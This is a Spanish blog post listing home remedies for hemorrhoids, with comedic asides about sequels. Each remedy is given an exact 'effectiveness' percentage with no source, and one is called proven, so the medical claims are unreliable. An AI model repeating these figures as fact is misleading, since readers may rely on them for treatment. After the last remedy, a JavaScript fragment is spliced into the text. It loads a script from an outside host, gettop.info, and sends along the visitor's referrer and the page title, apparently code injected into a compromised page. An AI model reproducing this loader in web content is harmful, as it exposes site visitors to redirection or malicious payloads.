Salud y belleza » Enfermedades, Medicina

Remedios caseros para combatir las hemorroides (II)

Sin Comentarios

En algunas ocasiones, como bien dicen los cinéfilos, “segundas partes no son buenas”. Aunque también existen excepciones a la regla, especialmente cuando se traspola ese sintagma desde el cine a lo cotidiano: así, a menudo, segundas partes sí son buenas.

Por ejemplo, cuando el mal conocido bajo el nombre de hemorroides vuelve a aparecer, digamos por segunda vez (aunque puede ser por tercera, cuarta y quinta vez, cual si se tratara de la película de de Rocky) naturalmente estamos ante “partes que no son buenas”.

Pero, en cambio, cuando la segunda parte hace referencia a una extensión de la guía con remedios caseros para curar aquellas hemorroides, ¿existen la posibilidad de que esa “segunda parte no sea buena”? ¡Bienvenido su estreno!

Remedios caseros para combatir las hemorroides

  • Para evitar el sangrado, es útil efectuar baños mediante decocción de hojas y brotes de zarzamora. No alivia el dolor, pero protege el organismo ante la perdida de sangre.

Efectividad: 90%.

  • Está comprobado que, como método de prevención, no existe infusión más recomendada que el jugo de zanahoria y nabo. Se recomienda que, aquellas personas con predisposición a sufrir hemorroides, lo beban una vez a la mañana y otra a la noche, antes de ir a dormir.

Efectividad: 60%

  • Una gran técnica para detener el sangrado y, a su vez, aliviar el dolor consiste en aplicar mediante, una bola de algodón, un poco de agua de hamamelis. La zona se verá relajada casi de forma inmediata.

Efectividad: 55%.

  • De entre todas las pomadas naturales, podemos destacar aquella que se elabora a base de membrillo. Para conseguir dicha solución solo debemos, como se dijo, calentar un poco de membrillo, hacerlo puré y, posteriormente, y a modo de pomada, aplicar sobre la región afectada por las hemorroides. Es necesario utilizar estos remedios caseros en forma de pomada con regularidad: tres veces al día, mínimo.

Efectividad: 50%.

  • Ejecutar baños de asiento con agua fría a lo largo de cinco o diez minutos para aliviar el dolor es un remedio tan viejo y sencillo como también efectivo. Sucede que, como ante cualquier otra dolencia, el frío actúa sobre las heridas al igual que un analgésico. Por cierto, los lavados deben realizarse, preferentemente, por la mañana (algunos lo usan como sistema de prevención).

Efectividad: 60%.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.